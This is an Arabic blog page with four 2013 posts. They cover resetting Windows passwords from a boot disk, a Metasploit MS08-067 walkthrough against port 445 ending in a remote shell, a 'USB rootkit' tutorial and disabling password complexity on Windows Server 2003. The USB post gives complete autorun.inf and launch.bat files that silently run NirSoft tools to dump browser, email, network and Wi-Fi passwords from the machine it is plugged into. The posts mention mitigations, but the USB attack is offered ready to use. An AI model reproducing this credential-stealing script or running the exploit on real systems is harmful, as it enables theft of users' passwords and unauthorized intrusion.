الأحد، 11 أغسطس 2013

إزالة كلمة المرور للمستخدمين في أنظمة مايكرسوفت

0 تعليق
في هاته المقالة، سنتحدت عن برنامج صغير في حجمه، كبير في فائدته، حيت يقوم بمسح كلمات للمستخدم  في جميع أنظمة مايكروسفت. كما يختلف عن باقي البرنامج بحجمه الصغير، وأيضا سهولة إستعماله، كما يمكن تسطيبه على أسطوانة وحتى الفلاشة. إسم البرنامج Offline NT Password & Registry Editor.


 يقوم برنامج Offline NT Password & Registry Editor على مسح كلمة السر لحسابات المستخدمين في أنظمة مايكروسفت،  ,Windows XP, Vista, 7 ou 8 ويعتبر هذا الملف نسخة مصغرة من نظام اللينكس. كما يمّكن هذا البرنامج من تعديل قاعدة البيانات لل regedit . إيضا إمكانية إضافة مستخدم بصلاحيات administrateur. يعتمد البرنامج على تعديل قاعدة البيانات للمستخدمين والتي تسمى ال( SAM (Security Account Manager . و الموجودة في المجلد Windows\system32\config


يوجد العديد من البرامج التي تقوم بإزالة كلمة السر للمستخدم، لكن سلبيتها أن وزنها تقيل مقارنة مع برنامج Offline NT Password & Registry Editor. 
عند نسيان كلمة السر للحساب ما ، أو ضياعها ، لا توجد طريقة للدخول إلى الحساب أو تغيير كلمة السر، وذلك لعدم وجود كلمة السر، وتنطبق هاته الخاصية فقط على الأجهزة الخاصة ، التي لا تخضع لسلطة ال domaine, لذا فهذا المقال يخص حساب المستخدم الوجود على الجهاز، وليس على السيرفر.

تحميل البرنامج:
نسخة ISO للاسطوانات: 

نسخة للفلاشة USB :

يتلائم مع :
Windows NT4 (Station et Serveur)
Windows 2000 (Professionnel et Serveur hors domaine)
Windows XP (Edition Familiale et Professionnel)
Windows 2003 (hors domaine) 
Windows VISTA
Windows 2008 (hors domaine) 
Windows 7
Windows 8 (compte local)
  
حرق الملف على الأسطوانة : 
في حالة عدم وجود فلاشة ، يجب حرق الملف الخاص بالأسطوانة، وذلك بإستعمال أحد البرامج ، ك Nero أو Free ISO Burner .

تسطيب البرنامج على الفلاشة : 
بعد أخد الفلاشة، نقوم بالقيام بعملية formatوذلك بFat32، لأن أنظمة الليكنس لا تتأقلم مع  NTFS.
نقوم بإخراج الملفات الموجودة في الملف الذي قمنا بتحميله، ووضعهم في الفلاشة ( في  :K مثلا )
من أجل جعل الجهاز يقلع من الفلاشة، لابد من إعداد الفلاشة. من أجل ذلك، نفتح نافدة  cmd, تم نوضع في مكان الفلاشة، في المتال التالي ، إسم موضع الفلاشة هو  :k, تم نكتب الأمر التالي :
k:>syslinux -ma k: 
k:هو إسم الفلاشة. 

 إستعمال البرنامج :
للإشارة فقط، فلغة البرناج هي الإنجليزية، لدى يجب الأخد بعين الإعتبار كيفية إستعمال لوحة المفاتيح بالنسبة للدين لديهم لوحة المفاتيح azerty.
 إعادة تشغيل الجهاز على الأسطوانة أو الفلاشة.
نقوم بتركيب الأسطوانة ( أوالفلاشة)  ، تم نعيد تشغيل  الجهاز، كما لا بد من إعداد خاصيات ال  حتى يقوم الجهاز على الأسطوانة ( أوالفلاشة) .
تشغيل البرنامج :
عند تشغيل البرنامج، نقوم بالظغط على Entrer.

ننتظر حتى يتم تحميل البرنامج 
  إختيار  الجزء(partition) المسطب عليه النظام.
في هاته المرحلة، يجب أن تكون على علم بالأجزاء الموجودة في القرص الصلب، و معرفة مكان وجود المجلد système32/config.
 عند وجود مجموعة من الأنظمة في الجهاز، يظهر في الشاشة مجموعة من الأجزاء (partisions) ، ويعد الجزء الأول المخصص لعملية الإقلاع (Boot)، لدى وجب نسيانه.

 نقوم بإختيار رقم الجزء (Partition).
عند  وجود الملف في الجزء الذي قمنا بإختياره، يقوم برنامج    Offline NT Password & Registry Editor بإظهار رسالة found ، أما في حالة العكس فيظهر كلمةnot found.
في حالة خطأ في الإختيار، يرجى الظغط على الحرف 'q'
.
نختار الرقم 1 من أجل مسح كلمة السر .
بعدما يقوم البرنامج بالبحت عن قاعدة البيانات SAM ، يظهر مجموعة من الإختيارات. نختار الرقم 1 للمسح كلمة السر.
إختيار حساب المستخدم الذي نريد مسح كلمة سره.
في هاته المرحلة، يظهر البرنامج الحسابات الموجودة في الجهاز. يقوم البرنامج باختيار حساب ال Administrateur ، يمكن اختيار مستخدم آخر، وذلك بكتابة إسم حساب المستخدم.
مسح كلمة السر بالضغط على 1.
نحن الآن أمام مجموعة من الإختيارات، من 1 إلى 4، ويقوم الحرف"q" بالخروج .
نشرح كل واحدة على حدى.
1-مسح كلمة السر للحساب المستخدم، والذي سنقوم بإختياره.
2 ـ تغيير كلمة السر للمستخدم، شخصيا لم أجربها . كما لا أحبدها أيضا.
3 ـ تحويل صلاحيات المستخدم إلى مستخدم عالي ( administrateur).
4 ـ تفعيل حساب مغلق، كحساب (invite (guest متلا.
الخروج من البرنامج.
بعد إختيار مسح كلمة السر، نقوم بالتأكيد على الإختيار، وذلك بالظغط على المفتاح 1. وللخروج ، نقوم بالظغط على المفتاحين في آن واحد ! + MAj , ثم على الحرف "q" للخروج نهائيا.
تسجيل المعلومات في الSAM  ثم إعادة تشغيل الجهاز. 
قبل الخروج، يطلب البرنامج إمكانية تشجيل المعلومات في SAM ، نقوم بالظغط على الحرف"y" للنحفظ المعلومات. تم سيقرح عليك بإستعمال البرنامج من جديد، نختار NO، بالظغط على "n". الإعادة تشغيل الجهاز، نظغط بشكل آن على المفاتيح التالية.
بعد إعادة تشغييل الجهاز، لا تنسى أن تقوم بإرجاع إعدادت ال Bios  إلى مكانها.

كلمة اخيرة
مع تطور عالم الإختراق، أصبح الكل يعلم كيفية مسح كلمة السر للمستخدم ، وذلك لتعدد البرامج التي تقوم بذلك. وللتقليل من نسبة إختراق الجهاز، يجب تحديد كلمة السر للBios فقط للتقليل من نسبة الإختراق. في التدوينات المقبلة، سنتعرف كيف يمكن إكتشاف كلمة السر للمستخدم ما .
ألقاكم في رعاية الله






كلمات متبطة
إزالة كلمة السر لل administrator.
برنامج Offline NT Password & Registry Editor

تابع القراءة Résuméabuiyad

الجمعة، 12 يوليو 2013

التعرف على تغرة microsoft-ds في أنظمة مايكروسفت

0 تعليق
لا شك أن أغلب مهندسي الشبكات والأنظمة يعلمون أن أنظمة مايكروسفت لا تخضع بما فيه الكفاية من الحماية، فأغلبية أنظمتها تعاني من نقص في الحماية.  لكن هذا لا يمنع من إستعمال هاته الأنظمة وأيضا حمايتها. في هاته المدونة، سأقدم واحدة من أخطر السلبيات، والتي قد تجعلك تخسر بها وظيفتك، كما سنحاول كيفية حل هاته المشكلة. مشكلتنا هاته الليلة microsoft-ds.



تعتبر نافدة 445 من أكثر النوافد إستغلال من طرف المخترقين، حيت تستعمل هاته النافدة (port) في مشاركة الملفات في الشبكة , وتسمى بخدمة microsoft-ds أي directory shared.
للقيام بهذا التجربة، نسقوم بإستعمال نظام ال backtrack, كما يمكن تجربة هاته التجربة على برنامج الVmwere أو VirtualBox.

ملاحظة: في هاته التدوينة لا نشجع على الإختراق، وأي محاولة منك تعد خارقة للقانون ( وبيني و بينك ،تدل على ضعف في الشخصية ).
خريطة الشبكة :
بعد تشغيل النظام، نقوم بفتح نافدة console.بالظغط على Ctrl+alt+t.
المرحلة الأولى : فحص السيرفر بواسطة الأمرnmap.
كما هو ملاحظ في الصورة، فالنافدة رقم 445 مفتوحة، التي سنحاول من خلالها إختراق الجهاز.
المرحلة التانية :  البحث عن الملف الذي يقوم بإستغلال التغرة .
نقوم بتحميل ملفات metaspolit وذلك بكتابة الأمر msfconsole .
ننتظر بعض الوقت حتى يتم تحميل جميع الملفات.

نقوم بالبحت عن كلمة netapi، والتي تقوم بإستغلال النافدة رقم 445، تم نختار الملف ms08_067_netapi، يجب تذركر مكان هذا الملف.
المرحلة الثالتة: القيام بعملية الإختراق.
في هاته المرحلة، يجب تحديد عنوان السيرفرRhost، وكذا عنوان جهازك ( الباكتراك ) Lhost. 
 تم إختراق الجهاز بنجاح, يمكن الآن التحكم في الجهاز، كما يمكن تطبيق مجموعة من الأوامر التي تساعد المخترق على سرق المعلومات والتحكم في السيرفر. نذكر أهم الأوامر.

 sysinfo
يمكن هذا الأمر من التعرف على معلومات حول الجهاز ونوعية نظامه.

shell
أعتبر هذا الأمر من أخطر الأوامر، حيث يمكنك من التواصل مباشرة بالجهاز عبر أوامر MS-Dos. وتكمن خطورته أيضا في التحكم في كل ما يوجد في الجهاز، من خدمات Acrive directory , DNS ...
ما هو الحل:
 يجب قفل النافدة رقم 445 في كل الأجهزة ، من سيرفرات وحتى الحواسيب، و يجب تسطيب برامج الحماية والتي تساعد على غلق النوافد الخطيرة. كما لا بد للشركة أن تتوفر على جدار ناري يحمي شبكتها الداخلية.
تابع القراءة Résuméabuiyad

السبت، 4 مايو 2013

إعداد الفلاشة usb Rootkit للسرقة معلومات سرية

0 تعليق
في أغلب المؤسسات و الشركات، و في إطار الحماية الإلكترونية، يقوم مدير الشبكة بتعطيل نوافد الUSB، ليس فقط لحماية الجهاز، بل أيضا لحماية الشبكة من أعمال الإختراق. في هاته المقالة، سوف نقوم بالقيام بدور المخترق ، حيت سوف نقوم بإعداد فلاشة ، تم سرقة مجموعة من المعلومات المتعلقة بالجهاز و بالشبكة، كما سوف نحاول التعرف على سبيل الوقاية من متل هاته الهجمات.


نبدأ أولا بتعريف معنى الكلمة، تتكون من كلمتين إتنتين. kit, و root،  فالأولى تعني مدير الشبكة، أما التانية، فتعني برنامج أو مجموعة برامج. و تنبني الفكرة على إستغلال صلاحيات صاحب الجهاز أو مدير الشبكة في سرقة أو تعديل الإعدادت أو تسطيب فيروسات  ، وذلك عبر تسطيب برامج مختصة في كل عملية .

عمليا:

هناك العديد من الأفكار في إستعمال هاته الطريقة، في هاته التدوينة سنناقش كيفية إستعمال الفلاشة في في سرقة معلومات سرية تخص الجهاز و الشبكة،  ككلمات السر للمستخدم، كلمة السر للبريد الإلكتروني، كلمات السر في المتصفح ، وأيضا كلمة السر للشبكات اللا سلكية.

 تطبيق:

كأول مرحلة، سنقوم بإنشاء ملف بإسم autorun.inf، والذي يحتوي على معلومات التالية:

# vi autorun.inf
[autorun]
open = launch.bat
ACTION = Scanner les Passwords

كمرحلة تانية، سنقوم بتحميل مجموعة من البرامج البسيطة من الموقع nirsoft.net و التي تقوم على سرقة المعلومات من الجهاز ( يمكن لبرامج الحماية أن تقوم بعملية الإنظار، فلك أن تجرب). 
 برنامج  ChromePass لسرقة معلومات من المتصفح   Google .Chrome
الرابط : http://www.nirsoft.net/utils/chromepass.html

 برنامج  IE PassView لسرقة معلومات من المتصفح   Internet Explore
الرابط :  http://www.nirsoft.net/utils/internet_explorer_password.html

برنامج  PasswordFox لسرقة معلومات من المتصفح من اسماء المستخدمين و كلمات السر   .
الرابط : http://www.nirsoft.net/utils/passwordfox.html

 برنامج  Mail PassView لسرقة معلومات من برامج البريد الكتروني المعروفة نذكر منها IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free, hotmail, yahoo, msn,gmail. Microsoft Outlook 2002/2003...
الرابط :  .http://www.nirsoft.net/utils/mailpv.html

 برنامج  Network Password Recovery عندما يقوم المستخدم بالدخول إلى ملف على الشبكة، يقوم بادخال معلومات كالإسم و كلمة السر، هذا البرنامج يقوم بالتعرف على المعلومات الخاصة بالمستخدم المتصل بالشبكة.
الرابط :http://www.nirsoft.net/utils/network_password_recovery.html

 برنامج  WirelessKeyView  : يقوم بالتعرف على جميع كلمات السر التي يدخلها المستخدم للإتصال بالشبكات اللا سلكية.

 
بعد أن قمنا بتحميل جميع البرامج ، سوف نقوم بتحضير الفلاشة () لذى وجب مسح جميع الملفات ولم لا القيام بعملية الفرمطة. 

1ـ تحويل جميع الملفات بصيغهexe. إلى الفلاشة.
2-2ـ نقوم بكتابة "نص" يحتوي على المعلومات التالية:

# vi autorun.inf
[autorun]
open = launch.bat
ACTION = Scan Passwords
يحتوي الملف على أمر، بحيت أن أول أمر سيقوم به النظام هو تشغيل ملف launch.bat.
2ـ  إنشاء ملف باسم  launch.bat يحتوي على المعلومات التالية: 

# vi launch.bat
@echo off
start ChromePass.exe /stext ChromePass.txt
start iepv.exe /stext iepv.txt
start mailpv.exe /stext mailpv.txt
start netpass.exe /stext netpass.txt
start PasswordFox.exe /stext PasswordFox.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt

نكون قد إنتهينا من إعداد الفلاشة، ولم يبقى سوى تركيبها على الجهاز.
يجب على الجهاز أن يسمح بتسطيب ملفات ال بطريقة أوتوماتيكية.
بعد تركيب الفلاشة، يقوم الجهاز بتسطيب البرامج، و تخزن المعلومات في ملف نصي ، حيت يحتوي على جميع المعلومات المسروقة.

الحلول المقترحة:
 كمدير الشبكة، لابد من  من إيجاد حل لهاته المشكلة الأمنية قبل حدوتها، نقترح منها:
1ـ تعطيل مداخيل الUSB.
2ـ إستعمال برامج الحماية ضد أعمال الrootkit.
3ـ عدم السماح للاجهزة بتسطيب ملفات autorun.inf.
4ـ عدم السماح للمستخدمين بتسطيب البرامج على الأجهزة.
... 

تابع القراءة Résuméabuiyad

الأحد، 31 مارس 2013

إزالة خاصية تعقيد كلمة السر في widows server 2003

0 تعليق
من أجل حماية المستخدمين من سرق وإختراق حساباتهم، تعمل مايكروسفت على تطبيق مجموعة من القواعد للكلمات السر. فمتلا يجب أن تكون كلمة السر لا تنقص على  7 حروف، ويجب تتوفر على حروف كبيرة و صغيرة و أيضا على رموز. لكن في بعض الأحيان، يتعضر على المستخدم تذكر كلمة سر معقدة، لذلك وجب إزالة خدمة الحماية لكلمة السر من إعدادت السيرفر.

عندما نقوم بإنشاء مستخدم على active directory ، وإعطاءه كلمة سر سهلة، يقوم النظام برفض هذه الكلمة، بإعتباتها كلمة لا تحترم قواعد الحماية. ومع أن من واجبات مدير الشبكة إدارة الشبكة والحفاظ على حمايتها، لكن مسؤول أيضا على أن يكون في خدمة المستخدمين. (خصوصا إذا كان مدير الشركة).
لإزالة تفعيل خدمة الحماية في كلمة السر على windows Server 2003، نقوم بالدخول إلى:

في هاته النافدة، نقوم بتغير ما نود تغييره، يمكن تقليل عدد الكلمات، كما يمكن عدم  تفعيل خاصية الحماية ... 
 نقوم بتحديث الactive directry عبر فتح نافدة الcommand، تم كتابة الأمر التالي :
gpupdate


تابع القراءة Résuméabuiyad

جميع الحقوق محفوظة ، مدونة NetworksGet